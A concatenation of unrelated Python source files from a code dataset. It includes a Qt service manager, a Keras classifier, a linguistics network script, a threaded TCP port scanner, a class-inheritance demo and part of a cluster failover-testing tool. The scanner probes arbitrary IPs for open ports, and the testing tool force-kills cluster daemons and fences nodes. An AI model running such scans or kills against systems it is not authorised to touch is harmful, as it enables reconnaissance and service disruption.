self.state_operate, 'start')\n self.paint_button('stop all', self.len_count + 2, 2, self.state_operate, 'stop')\n\n self.center()\n self.setWindowTitle('Service Management')\n\n self.show()\n\n def paint_tool_button(self, row, service_display_name, service_name, service_log_address, service_setup_address):\n\n '''\n Packaging the tool button paint to reduce code quantity\n :param row: the number of rows in which the button is located\n :param service_display_name: the service's name which to display\n :param service_name: service's name\n :param service_log_address: the address of the log file for the service\n :param service_setup_address: the address of the installation document for the service\n :return: None\n '''\n\n self.tool_button = QToolButton(self)\n self.tool_button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)\n self.tool_button.setToolTip('Select a action to perform')\n self.tool_button.setPopupMode(QToolButton.MenuButtonPopup)\n self.tool_button.setText(service_display_name)\n self.tool_button.setAutoRaise(True)\n self.grid.addWidget(self.tool_button, row, 0)\n\n tb_menu = QMenu()\n\n start_service = QAction('Start Service', self)\n stop_service = QAction('Stop Service', self)\n restart_service = QAction('ReStart Service', self)\n service_log = QAction('Open Service Log', self)\n service_start_auto = QAction('Set Service Start Auto', self)\n service_start_demand = QAction('Set Service Start Demand', self)\n service_disable = QAction('Set Service Disable', self)\n service_setup = QAction('Setup the Service', self)\n service_delete = QAction('Uninstall the Service', self)\n\n tb_menu.addAction(start_service)\n tb_menu.addAction(stop_service)\n tb_menu.addAction(restart_service)\n tb_menu.addSeparator()\n tb_menu.addAction(service_log)\n tb_menu.addSeparator()\n tb_menu.addAction(service_start_auto)\n tb_menu.addAction(service_start_demand)\n tb_menu.addAction(service_disable)\n tb_menu.addSeparator()\n tb_menu.addAction(service_setup)\n tb_menu.addAction(service_delete)\n\n self.tool_button.setMenu(tb_menu)\n\n start_service.triggered.connect(lambda: on_click(row, 'start', service_name))\n stop_service.triggered.connect(lambda: on_click(row, 'stop', service_name))\n restart_service.triggered.connect(lambda: on_click(row, 'restart', service_name))\n service_log.triggered.connect(lambda: on_click(row, 'log', service_log_address))\n service_start_auto.triggered.connect(lambda: on_click(row, 'auto_start', service_name))\n service_start_demand.triggered.connect(lambda: on_click(row, 'auto_demand', service_name))\n service_disable.triggered.connect(lambda: on_click(row, 'disable', service_name))\n service_setup.triggered.connect(lambda: on_click(row, 'setup', service_setup_address, service_name))\n service_delete.triggered.connect(lambda: on_click(row, 'uninstall', service_name))\n\n def on_click(row, action, mes, param=None):\n\n '''\n Button click event control\n :param row: the number of rows in which the button is located\n :param action: set tool button event name\n :param mes: param of event\n :param param: param of event\n :return:\n '''\n\n result = None\n\n if action == 'start' or action == 'stop':\n step = self.system_svc.service_state_operate(mes, action)\n if step != 'uninstalled' and step != 'active' and step != 'inactive':\n time.sleep(0.5)\n result = self.system_svc.get_service_state(mes)\n else:\n result = step\n elif action == 'restart':\n step = self.system_svc.restart_service(mes)\n if step != 'uninstalled':\n time.sleep(0.5)\n result = self.system_svc.get_service_state(mes)\n else:\n result = step\n elif action == 'log':\n result = self.system_svc.open_log(mes)\n elif action == 'auto_start' or action == 'auto_demand' or action == 'disable':\n result = self.system_svc.auto_start_service(mes, action)\n elif action == 'setup':\n result = self.system_svc.open_setup(param, mes)\n elif action == 'uninstall':\n result = self.system_svc.delete_service(mes)\n\n self.state_pic.deleteLater()\n self.state_label.deleteLater()\n self.get_state(row, mes)\n\n if result == 'uninstalled':\n QMessageBox.about(self, 'Error', 'Service uninstalled')\n else:\n if action == 'log' or action == 'auto_start' or action == 'setup':\n QMessageBox.about(self, 'result', 'Executed operation')\n elif action == 'start' or action == 'stop' or action == 'restart':\n if result == 'active' and action == 'start':\n QMessageBox.about(self, 'result', '{name} has already started'.format(name=mes))\n elif result == 'active' and action == 'stop':\n QMessageBox.about(self, 'Error', '{name} stop error'.format(name=mes))\n elif result == 'inactive' and action == 'stop':\n QMessageBox.about(self, 'result', '{name} has already stopped'.format(name=mes))\n elif result == 'inactive' and action == 'start':\n QMessageBox.about(self, 'Error', '{name} start error'.format(name=mes))\n elif result == 'success' or result == 'error':\n QMessageBox.about(self, 'result',\n '{name} {state} {result}'.format(name=mes, state=action, result=result))\n elif action == 'delete':\n QMessageBox.about(self, 'result',\n '{name} {state} {result}'.format(name=mes, state=action, result=result))\n\n def get_state(self, row, service_name):\n\n '''\n Get service's state\n :param row: the number of rows in which the message is located\n :param service_name: service's name\n :return: None\n '''\n\n state = self.system_svc.get_service_state(service_name)\n mes = 'Initialization'\n pic = self.red_img\n\n if state == 'active':\n mes = '已启动'\n pic = self.green_img\n elif state == 'inactive':\n mes = '未启动'\n pic = self.red_img\n elif state == 'uninstalled':\n mes = '未安装'\n pic = self.yellow_img\n\n self.state_pic = QLabel(self)\n self.state_pic.setPixmap(pic)\n self.grid.addWidget(self.state_pic, row, 1)\n\n self.state_label = QLabel(mes, self)\n self.grid.addWidget(self.state_label, row, 2)\n\n def paint_button(self, btn_name, row, column, function, *args, **kwargs):\n\n '''\n Packaging the button paint to reduce code quantity\n :param btn_name: button's name\n :param row: the number of rows in which the button is located\n :param column: the number of columns in which the button is location\n :param function: the function which linked to the button\n :param args: button-linked-function's params\n :param kwargs: button-linked-function's params\n :return: None\n '''\n\n button = QPushButton(btn_name, self)\n button.setCheckable(False)\n self.grid.addWidget(button, row, column)\n\n button.clicked.connect(lambda: function(*args, **kwargs))\n\n def center(self):\n\n '''\n Set the window center of screen\n :return: None\n '''\n\n geomotry = self.frameGeometry()\n center_point = QDesktopWidget().availableGeometry().center()\n geomotry.moveCenter(center_point)\n self.move(geomotry.topLeft())\n\n def closeEvent(self, QCloseEvent):\n\n '''\n Show a message box when close the window\n :param QCloseEvent:\n :return: None\n '''\n\n reply = QMessageBox.question(self, 'Message', 'Are you sure to quit?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.Yes:\n QCloseEvent.accept()\n else:\n QCloseEvent.ignore()\n\n def state_operate(self, state):\n\n '''\n The function which used to link to the button\n :param state: use to distinction different operate\n :return: None\n '''\n\n success_count = 0\n uninstall_count = 0\n error_count = 0\n already_count = 0\n\n for i in range(self.len_count):\n result = self.system_svc.service_state_operate(self.service_list.get('service_' + str(i + 1)).service_name,\n state)\n if result == 'success':\n success_count += 1\n elif result == 'uninstalled':\n uninstall_count += 1\n elif result == 'error':\n error_count += 1\n elif result == 'active' or result == 'inactive':\n already_count += 1\n\n self.get_state(i, self.service_list.get('service_' + str(i + 1)).service_name)\n\n QMessageBox.about(self, 'result',\n '{success_count}/{totality_count} have successful {state}\\n'\n '{uninstall_count}/{totality_count} uninstalled\\n'\n '{error_count}/{totality_count} {state} error\\n'\n '{already_count}/{totality_count} already {state}'.format(\n success_count=success_count, uninstall_count=uninstall_count,\n error_count=error_count, already_count=already_count,\n totality_count=self.len_count, state=state))\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":12994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67974527","text":"from __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\n#from keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import load_model\nimport pickle\nimport glob\nimport os\n\ntest_features = []\ntest_labels = []\ntrain_features = []\ntrain_labels = []\nfeatures = []\nlabels = []\ntraining = True\nmaxcount = 260\nclass_num = 8\nfeature_num = 14\nignore_back = True\ndata_type = 'butt' #databack0628 is butt_back\ndata_folder = 'data0609/'\nmodel_folder = \"kfold_model_mlp_1_64/\"\nresult_file = 'result_mlp_1_64.txt'\nfolderName = ['1_proper','3_lying','4_left','5_right','6_leftcross','7_rightcross','8_leftcross1','9_rightcross1']\n# testName = ['andy_','chiang_','chris_','cliff_','eric_','eric2_','ethan_','ginger_','howard_','jessica_','lulu_','morris2_','nemo_','nemo2_','ruby_','ryan_','ryan2_','sara_','scott_','weiting_','wen_','yao2_','yuwen_']\ntestName = glob.glob(data_folder+'/'+folderName[0]+'/*.txt')\nfresult = open(data_folder+result_file,'w')\nfresult.close()\nfor i in range(len(testName)):\n\tstring = folderName[0].replace('1_','')\n\ttestName[i] = testName[i].replace(data_folder+'/'+folderName[0]+'/','').replace(string+'.txt','')\n# removeName = ['chiang_','cliff_','chunhao_','ryan_']\n# removeName = ['chiang_','chris_','cliff_','eric_','hhvs1354_','chunhao_','sara_','ryan_']\n# for i in range(len(removeName)):\n# \ttestName.remove(removeName[i])\n\nfor name in testName:\n\ttest_features.append([])\n\ttest_labels.append([])\n\ttrain_features.append([])\n\ttrain_labels.append([])\n\tfor i in folderName:\n\t\tfile_list = glob.glob(data_folder+'/'+i+\"/*.txt\")\n\t\tfor j in file_list:\n\t\t\tf = open(j,'r')\n\t\t\tcount = 0\n\t\t\tfor k in f:\n\t\t\t\tif count == maxcount:\n\t\t\t\t\tbreak\n\t\t\t\tline = k.split()\n\t\t\t\tif len(line) != feature_num:\n\t\t\t\t\tcontinue\n\t\t\t\ttemp = list(map(int,line))\n\t\t\t\tif data_type=='butt_back' and ignore_back:\n\t\t\t\t\ttemp = temp[0:7]+temp[14:21]\n\t\t\t\tif '/'+name in j:\n\t\t\t\t\ttest_features[-1].append(temp)\n\t\t\t\t\ttest_labels[-1].append(folderName.index(i))\n\t\t\t\telse:\n\t\t\t\t\ttrain_features[-1].append(temp)\n\t\t\t\t\ttrain_labels[-1].append(folderName.index(i))\n\t\t\t\tcount += 1\n\nif not os.path.exists(data_folder+model_folder):\n\tos.mkdir(data_folder+model_folder)\naccuracy_list = [0]*len(testName)\nacc_num_people = []\nall_error_matrix = np.zeros((class_num,class_num))\nfor i in range(class_num):\n\tacc_num_people.append([0]*10)\nfor val in range(len(testName)):\n\n\tbatch_size = 128\n\tnb_classes = class_num\n\tnb_epoch = 100\n\n\t# the data, shuffled and split between train and test sets\n\t[X_train, y_train, X_test, y_test] = [train_features[val],train_labels[val],test_features[val],test_labels[val]]\n\tX_train = np.array(X_train)\n\ty_train = np.array(y_train)\n\tX_test = np.array(X_test)\n\ty_test = np.array(y_test)\n\t#X_train = X_train.reshape(60000, 784)\n\t#X_test = X_test.reshape(10000, 784)\n\tX_train = X_train.astype('float32')\n\tX_test = X_test.astype('float32')\n\tX_train /= 1024\n\tX_test /= 1024\n\tprint(X_train.shape[0], 'train samples')\n\tprint(X_test.shape[0], 'test samples')\n\t\n\t# convert class vectors to binary class matrices\n\tY_train = np_utils.to_categorical(y_train, nb_classes)\n\tY_test = np_utils.to_categorical(y_test, nb_classes)\n\n\tif training:\n\t\tmodel = Sequential()\n\t\tif data_type=='butt_back' and ignore_back:\n\t\t\tmodel.add(Dense(64, input_shape=(feature_num/2,)))\n\t\telse:\n\t\t\tmodel.add(Dense(64, input_shape=(feature_num,)))\n\t\tmodel.add(Activation('tanh'))\n\t\tmodel.add(Dropout(0.2))\n\t\t# model.add(Dense(128))\n\t\t# model.add(Activation('tanh'))\n\t\t# model.add(Dropout(0.2))\n\t\tmodel.add(Dense(nb_classes))\n\t\tmodel.add(Activation('softmax'))\n\n\t\tmodel.summary()\n\n\t\tmodel.compile(loss='categorical_crossentropy',\n\t\t optimizer=SGD(lr=0.01),\n\t\t metrics=['accuracy'])\n\t\tcheckpointer = ModelCheckpoint(filepath=data_folder+model_folder+testName[val]+'.h5', verbose=0, save_best_only=True)\n\t\thistory = model.fit(X_train, Y_train,\n\t\t batch_size=batch_size, nb_epoch=nb_epoch,\n\t\t verbose=1, validation_data=(X_test, Y_test),\n\t\t callbacks=[checkpointer])\n\t\t# model.save(model_folder+testName[val]+'.h5')\n\n\t# load model\n\tmodel = load_model(data_folder+model_folder+testName[val]+'.h5')\n\n\t# evaluate\n\tscore = model.evaluate(X_test, Y_test, verbose=0)\n\terror_matrix = np.zeros((nb_classes,nb_classes))\n\tresults = model.predict(X_test)\n\tfor i in range(len(results)):\n\t\terror_matrix[list(Y_test[i]).index(max(Y_test[i]))][list(results[i]).index(max(results[i]))]+=1\n\tprint(error_matrix)\n\tprint('Test score:', score[0])\n\tprint('Test accuracy:', score[1])\n\taccuracy_list[val] = score[1]\n\n\n\tfresult = open(data_folder+result_file,'a')\n\tfresult.write(testName[val]+'- error matrix: \\n')\n\tall_error_matrix += error_matrix\n\tfor error in error_matrix:\n\t\tfresult.write(str(error)+'\\n')\n\tfor i in range(len(error_matrix)):\n\t\teach_pose_acc = float(error_matrix[i][i])/sum(error_matrix[i])\n\t\tfresult.write(str(each_pose_acc)+'\\n')\n\t\ttry:\n\t\t\tacc_num_people[i][int(each_pose_acc*10-0.1)] += 1\n\t\texcept:\n\t\t\timport pdb;pdb.set_trace()\n\tfresult.write(testName[val]+'- accuracy: '+str(accuracy_list[val])+'\\n')\n\tfresult.close()\n\n\n\nfresult = open(data_folder+result_file,'a')\nfresult.write('average accuracy: '+str(sum(accuracy_list)/len(testName))+'\\n')\nfor pose in acc_num_people:\n\tfresult.write(str(pose)+'\\n')\nfresult.write('average error matrix: \\n')\nfor i in range(len(all_error_matrix)):\n\tall_error_matrix[i] = all_error_matrix[i]/float(sum(all_error_matrix[i]))\n\tfresult.write(str(all_error_matrix[i])+'\\n')\nfresult.close()\ntable_file = data_folder+result_file.replace('txt','jpg')\nexecfile(\"test_table.py\")","sub_path":"kfold.py","file_name":"kfold.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"176822392","text":"from concepticondata.util import *\nfrom lingpy import *\nimport lingpy\nfrom glob import glob\nfrom sys import argv\nimport networkx as nx\nfrom sys import argv\n\nclists = glob('../concepticondata/conceptlists/*.tsv')\nconcepticon = dict([(a,b) for a,*b in csv2list('../concepticondata/concepticon.tsv',\n strip_lines=False)])\n\n#clists = [l for l in clists if len(l.split('-')[-1][:-4]) == 3 and\n# l.split('-')[-1][0] in '12']\nprint(len(clists))\n\n\nG = nx.Graph()\nC = {}\n\nif 'best' in argv:\n for i,l1 in enumerate(clists):\n \n list1 = load_conceptlist(l1)\n name1 = l1.split('/')[-1][:-4]\n if 'GLOSS' in list1['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n \n set1 = dict(set([\n (list1[k]['CONCEPTICON_ID'], list1[k][key]) for k in list1 if k not in \n ['header','splits','mergers']\n ]))\n print('[i] analyzing list {0}...'.format(name1))\n for k in set1:\n try:\n C[k] += [name1]\n except KeyError:\n C[k] = [name1]\n \n print(len([x for x in C if len(C[x]) >= 70]))\n \n best_concepts = []\n with open('best-concepts.tsv', 'w') as f:\n for x in C:\n if len(C[x]) >= 50:\n f.write(x+'\\n')\n best_concepts += [x]\n print(len(best_concepts))\n\n\nelse:\n\n best_concepts = [x[0] for x in csv2list('best-concepts.tsv')]\n\n\n_clists = []\nSTATES = {}\nfor i,l1 in enumerate(clists):\n \n list1 = load_conceptlist(l1)\n name1 = l1.split('/')[-1][:-4]\n if 'GLOSS' in list1['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n\n set1 = dict(set([\n (list1[k]['CONCEPTICON_ID'], list1[k][key]) for k in list1 if k not in \n ['header','splits','mergers']\n ]))\n \n if len([k for k in set1 if k in best_concepts]) >= 70:\n if 'GLOSS' in list1['header']:\n pass\n else:\n _clists += [l1]\n\n for k in best_concepts:\n \n try:\n v = set1[k]\n except:\n v = '?'\n\n try:\n STATES[k] += [v]\n except KeyError:\n STATES[k] = [v]\n\nfor k,v in STATES.items():\n states = sorted(set(v))\n tmp = {}\n for i,j in zip(states,'abcdefghijklmnopqrstuvw'):\n if i != '?':\n tmp[i] = j\n else:\n tmp[i] = '?'\n STATES[k] = tmp\ninput('bishier')\n\n\n\n\n\n\nprint(len(_clists))\n\nM = [[0 for l in _clists] for n in _clists]\nnames = []\n\nstates = ''\n\nfor i,l1 in enumerate(_clists):\n \n list1 = load_conceptlist(l1)\n name1 = l1.split('/')[-1][:-4]\n names += [name1.replace('-','_')]\n if 'GLOSS' in list1['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n\n set1 = dict(set([\n (list1[k]['CONCEPTICON_ID'], list1[k][key]) for k in list1 if k not in \n ['header','splits','mergers']\n ]))\n print('[i] analyzing list {0}...'.format(name1))\n\n states += name1+'\\t'\n for k in best_concepts:\n if k in set1:\n states += STATES[k][set1[k]]\n else:\n states += '?'\n states += '\\n'\n\n for j,l2 in enumerate(_clists):\n if i < j:\n\n list2 = load_conceptlist(l2)\n name2 = l2.split('/')[-1][:-4]\n\n if 'GLOSS' in list2['header']:\n key = 'GLOSS'\n else:\n key = 'ENGLISH'\n \n set2 = dict(set([\n (list2[k]['CONCEPTICON_ID'], list2[k][key]) for k in list2 if k not in \n ['header','splits','mergers']\n ]))\n\n commons = [k for k in set1 if k in set2]\n ld = []\n for k in best_concepts:\n if k in set1 and k in set2:\n if set1[k] == set2[k]:\n ld += [0]\n else:\n ld += [0.95]\n else:\n pass\n #ld += [1]\n\n #ld += [edit_dist(set1[k],set2[k], normalized=True)]\n if ld:\n d = sum(ld) / len(ld)\n else:\n d = 1\n\n if d < 0.05:\n G.add_edge(name1, name2, weight=1-d)\n M[i][j] = d\n M[j][i] = d\n \n\nwith open('states.nex', 'w') as f:\n f.write(states)\n\n\ntxt = lingpy.convert.strings.matrix2dst(M, taxa=names, taxlen=0)\nwith open('distances.dst', 'w') as f:\n f.write(txt)\n\nnx.write_gml(G, 'network.gml')\n","sub_path":"helpers/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"64448054","text":"#This is a fast port scanner. Works on the principle of threading which\r\n#gives it much faster speeds.\r\nimport socket,sys,time,threading,re\r\n\r\nactive_ports = {}\r\n\r\n#function machinery is the backbone and is fed into threading\r\ndef machinery(ip,port):\r\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\ts.settimeout(1)\r\n\ttry:\r\n\t\ts.connect((ip,port))\r\n\t\tactive_ports[port] = 'ON'\r\n\texcept:\r\n\t\tactive_ports[port] = ''\r\n\r\n#a function for reading port range in a min-max format\r\ndef port_ends(r):\r\n\tvals = r.split('-')\r\n\r\n\tvals[0] = int(vals[0])\r\n\tvals[1] = int(vals[1])\r\n\r\n\t#for bad input\r\n\tif vals[1] < vals[0]:\r\n\t\ttemp = vals[1]\r\n\t\tvals[1] = vals[0]\r\n\t\tvals[0] = temp\r\n\r\n\treturn vals\r\n\r\n#The function that works to thread the machinery\r\ndef scan(ip,num_threads,r):\r\n\tends = port_ends(r)\r\n\tlast_port = ends[1]\r\n\tcount = ends[0]\r\n\toffset = count\r\n\r\n\tif last_port > 65535:\r\n\t\tprint(\"Invalid ports! Quitting!\")\r\n\t\tmain()\r\n\r\n\r\n\tthreads = []\r\n\r\n\twhile count <= last_port:\r\n\t\tfor i in range(count,count+num_threads):\r\n\t\t\tt = threading.Thread(target=machinery,args=(ip,i))\r\n\t\t\tthreads.append(t)\r\n\t\t\tthreads[i-offset].start()\r\n\r\n\t\tfor i in range(count,count+num_threads):\r\n\t\t\tthreads[i-offset].join()\r\n\r\n\t\tfor i in range(count,count+num_threads):\r\n\t\t\tif active_ports[i] == 'ON':\r\n\t\t\t\tprint(f\"Port {i} is ON\")\r\n\r\n\t\tcount += num_threads\r\n\r\n\r\ndef main():\r\n\r\n\t#print welcome banner\r\n\tprint(\"\"\"\r\n /$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ \r\n /$$__ $$| $$ | $$|_ $$_/| $$ /$$/ /$$__ $$| $$ /$$/ /$$__ $$| $$$ | $$ \r\n| $$ \\ $$| $$ | $$ | $$ | $$ /$$/ | $$ \\__/| $$ /$$/ | $$ \\ $$| $$$$| $$ \r\n| $$ | $$| $$ | $$ | $$ | $$$$$/ | $$$$$$ | $$$$$/ | $$$$$$$$| $$ $$ $$ \r\n| $$ | $$| $$ | $$ | $$ | $$ $$ \\____ $$| $$ $$ | $$__ $$| $$ $$$$ \r\n| $$/$$ $$| $$ | $$ | $$ | $$\\ $$ /$$ \\ $$| $$\\ $$ | $$ | $$| $$\\ $$$ \r\n| $$$$$$/| $$$$$$/ /$$$$$$| $$ \\ $$| $$$$$$/| $$ \\ $$| $$ | $$| $$ \\ $$ \r\n \\____ $$$ \\______/ |______/|__/ \\__/ \\______/ |__/ \\__/|__/ |__/|__/ \\__/ \r\n \\__/ \r\n \r\n \t\"\"\")\r\n\r\n\tprint(\"<---------------------------------Version (0.1)---------------------------------------------->\\n\")\r\n\r\n\tip = input(\"Enter the IP Address of the host : \")\r\n\tprint(f\"You entered IP : {ip}\\n\")\r\n\r\n\tprint(\"Choose an option : \\n 1. Scan for common ports \\n 2. Custom scan \\n 3. Go Home\\n\")\r\n\r\n\tchoice = int(input(\"Your choice : \"))\r\n\r\n\r\n\tif choice == 1:\r\n\t\tnum_threads = int(input(\"\\nSet the number of threads (1-200) : \"))\r\n\r\n\t\tif num_threads < 1 or num_threads > 200:\r\n\t\t\tnum_threads = int(input(\"Please enter a valid number of threads : \"))\r\n\r\n\t\telse:\r\n\t\t\tstart = time.time()\r\n\t\t\tr = '1-1000'\r\n\t\t\tprint(\"\\n\")\r\n\t\t\tscan(ip,num_threads,r)\r\n\t\t\tprint(f\"\\nPort sacn finished! Process completed in {round(time.time()-start,2)} seconds\")\r\n\t\t\tsys.exit()\r\n\r\n\r\n\r\n\telif choice == 2:\r\n\t\tr = input(\"\\nEnter the port range (min-max, eg 1-1000) : \")\r\n\r\n\t\tnum_threads = int(input(\"Set the number of threads (1-200) : \"))\r\n\r\n\t\tif num_threads < 1 or num_threads > 200 :\r\n\t\t\tnum_threads = int(input(\"Please enter a valid number of threads (1-200) : \"))\r\n\r\n\t\telse:\r\n\t\t\tstart = time.time()\r\n\t\t\tprint(\"\\n\")\r\n\t\t\tscan(ip,num_threads,r)\r\n\t\t\tprint(f\"\\nPort scan finished! Process completed in {round(time.time()-start,2)} seconds\")\r\n\t\t\tsys.exit()\r\n\r\n\telif choice == 3:\r\n\t\tprint(\"Quitting program!\")\r\n\t\tsys.exit()\r\n\r\n\telse:\r\n\t\tprint(\"Invalid choice. Quitting!\")\r\n\t\tsys.exit()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\ttry:\r\n\t\tmain()\r\n\texcept KeyboardInterrupt:\r\n\t\tprint(\"Quitting program!\")\r\n\t\tsys.exit()\r\n\r\n\r\n\r\n\r\n\t\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t","sub_path":"Quikskan/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"39757615","text":"\nclass School(object):\n def __init__(self,name,addr):\n self.name = name\n self.addr = addr\n self.students = []\n self.teacher = []\n def enrool(self,stu_obj):\n print(\"为学员%s办理注册手续\" % stu_obj.name)\n self.students.append(stu_obj.name)\n def hire(self,tea_obj):\n print(\"雇佣%s为%s教学老师\" % (tea_obj.name,tea_obj.course))\n self.teacher.append(tea_obj.name)\n\nclass SchoolMenber(object): #object属于基类,祖师爷级别的\n def __init__(self,name,age,sex):\n self.name = name\n self.age = age\n self.sex = sex\nclass Teacher(SchoolMenber):\n def __init__(self,name,age,sex,salary,course):\n super(Teacher,self).__init__(name,age,sex)\n self.salary = salary\n self.course = course\n def tell(self):\n print('''----教师信息----\nname %s\nage %s\nsex %s\nsalary %s\ncourse %s''' % (self.name,self.age,self.sex,self.salary,self.course))\n def teach(self):\n print(\"%s正在讲%s\" %(self.name,self.course))\n\nclass Student(SchoolMenber):\n def __init__(self,name,age,sex,stu_id,grade):\n super(Student,self).__init__(name,age,sex)\n self.stu_id = stu_id\n self.grade = grade\n def tell(self):\n print('''----学生信息----\nname %s\nage %s\nsex %s\nstu_id %s\ngrade %s''' % (self.name,self.age,self.sex,self.stu_id,self.grade))\n def pay_tuition(self,amount):\n print(\"%s交了%s元的学费\" %(self.name,amount))\n\n\nschool = School(\"小张IT\",\"图景\")\nt1 = Teacher(\"小张\",22,'女',20000,\"东北话\")\nt2 = Teacher(\"小金\",23,'男',30000,'python')\n\n\ns1 = Student(\"小小张\",'12','女',1,'python')\ns2 = Student(\"小小金\",'13','男',2,'东北话')\n\nt1.tell()\ns1.tell()\nschool.enrool(s1)\nschool.enrool(s2)\nschool.hire(t1)\nschool.hire(t2)\nprint(school.students)\nprint(school.teacher)","sub_path":"test/继承-实例.py","file_name":"继承-实例.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"112245971","text":"#!/usr/bin/env python3\nimport sys\nimport re\nimport argparse\nimport functools\nimport getpass\nimport time\nimport threading\nfrom datetime import datetime\n\nfrom . import check\nfrom . import config\nfrom . import pam\nfrom . import utils\n\n\nclass Context(object):\n def __setattr__(self, name, value):\n super().__setattr__(name, value)\n\n\ndef login(func):\n @functools.wraps(func)\n def login_func(*args, **kwargs):\n if config.LOGIN:\n print(\"###############\")\n else:\n username = config.LOGIN_USER if config.LOGIN_USER else input(\"User name: \")\n if username == \"\" or username != \"hacluster\":\n utils.msg_error(\"User name is error!\")\n sys.exit(1)\n password = config.LOGIN_PASSWORD if config.LOGIN_PASSWORD else getpass.getpass()\n\n pam_instance = pam.pam()\n pam_instance.authenticate(username, password)\n if pam_instance.code != 0:\n utils.msg_error(pam_instance.reason)\n sys.exit(pam_instance.code)\n print(\"###############\")\n config.LOGIN = True\n\n func(*args, **kwargs)\n\n return login_func\n\n\ndef kill_testcase(context):\n '''\n --kill-sbd: restarted or fenced\n --kill-sbd -l fenced\n --kill-corosync restarted or fenced\n --kill-corosync -l fenced\n --kill-pacemakerd restarted\n --kill-pacemakerd -l blocked by bsc#1111692\n '''\n def print_header(context):\n print(\"Testcase: Force Kill \\\"{}\\\"\".format(context.current_kill))\n print(\"Expected Results: {}\".format(context.expected))\n print(\"Looping: {}\".format(context.loop))\n print(context.note)\n\n def check_restarted(context):\n count = 0\n while count < 10:\n rc, pid = utils.get_process_status(context.current_kill)\n if rc:\n utils.msg_info(\"Process {}({}) is restarted!\".format(context.current_kill, pid))\n return\n time.sleep(0.5)\n count += 1\n utils.msg_error(\"Process {} is not restarted!\".format(context.current_kill))\n\n def kill(context):\n if \"Fenced\" in context.expected and not utils.fence_enabled():\n utils.msg_error(\"stonith is not enabled!\")\n sys.exit(1)\n\n while True:\n if not is_process_running(context):\n continue\n\n utils.msg_warn(\"Trying to run \\\"{}\\\"\".format(context.cmd))\n utils.run_cmd(context.cmd)\n\n if not context.loop:\n break\n # endless loop will lead to fence\n\n thread_check = threading.Thread(target=utils.anyone_kill, args=(utils.me(), ))\n thread_check.start()\n check_restarted(context)\n\n\n expected = {\n 'sbd': ('''a) sbd process restarted\n b) This node fenced.''', 'This node fenced'),\n 'corosync': ('''a) corosync process restarted\n b) This node fenced.''', 'This node fenced'),\n 'pacemakerd': ('pacemakerd process restarted', None),\n }\n\n note = '''\\nNOTE: The final report will explain the cluster behavior according to each test case.\n Some behavior might be not so obvious, and could be a bit complex indeed.'''\n\n for case in ('sbd', 'corosync', 'pacemakerd'):\n if getattr(context, case):\n if case == 'pacemakerd' and context.loop:\n return #blocked by bsc#1111692\n\n context.current_kill = case\n context.expected = expected[case][1] if context.loop else expected[case][0]\n context.cmd = r'killall -9 {}'.format(case)\n context.note = note\n\n print_header(context)\n if not utils.ask(\"Run?\"):\n return\n\n kill(context)\n\n\ndef fence_node(context):\n if not context.fence_node:\n return\n\n # check required commands exists\n required_commands = ['crm_node', 'stonith_admin', 'crm_attribute']\n for cmd in required_commands:\n if not utils.which(cmd):\n sys.exit(1)\n\n node = context.fence_node\n # check crm_node command\n if not utils.check_node_status(node, 'member'):\n utils.msg_error(\"Node \\\"{}\\\" not in cluster!\".format(node))\n sys.exit(1)\n\n fence_enabled, fence_action, fence_timeout = utils.get_fence_info()\n # check whether stonith is enabled\n if not fence_enabled:\n utils.msg_error(\"stonith is not enabled!\")\n sys.exit(1)\n # get stonith action\n if not fence_action:\n sys.exit(1)\n if not fence_timeout:\n fence_timeout = config.FENCE_TIMEOUT\n\n print(\"Testcase: Fence node \\\"{}\\\"\".format(node))\n print(\"Expect Results: {}\".format(fence_action))\n print(\"Fence Timeout: {}\".format(fence_timeout))\n if not utils.ask(\"Run?\"):\n return\n utils.msg_warn(\"Trying to fence node \\\"{}\\\"\".format(node))\n\n thread_check = threading.Thread(target=utils.anyone_kill, args=(node, fence_timeout))\n utils.run_cmd(config.FENCE_NODE.format(node), wait=False)\n if node == utils.me():\n # fence self\n utils.msg_info(\"Waiting {}s for self {}...\".format(fence_timeout, fence_action))\n thread_check.start()\n\n time.sleep(int(fence_timeout))\n utils.msg_error(\"Am I Still live?:(\")\n sys.exit(1)\n else:\n # fence other node\n utils.msg_info(\"Waiting {}s for node \\\"{}\\\" {}...\".format(fence_timeout, node, fence_action))\n thread_check.start()\n\n count = 0\n while count < int(fence_timeout):\n if utils.check_node_status(node, 'lost'):\n utils.msg_info(\"Node \\\"{}\\\" has been fenced successfully\".format(node))\n return\n time.sleep(1)\n count += 1\n utils.msg_error(\"Node \\\"{}\\\" Still alive?:(\".format(node))\n sys.exit(1)\n\n\ndef is_process_running(context):\n rc, pid = utils.get_process_status(context.current_kill)\n if not rc:\n return False\n utils.msg_info(\"Process {}({}) is running...\".format(context.current_kill, pid))\n return True\n\n\ndef parse_argument(context):\n parser = argparse.ArgumentParser(description='Cluster Testing Tool Set',\n allow_abbrev=False,\n 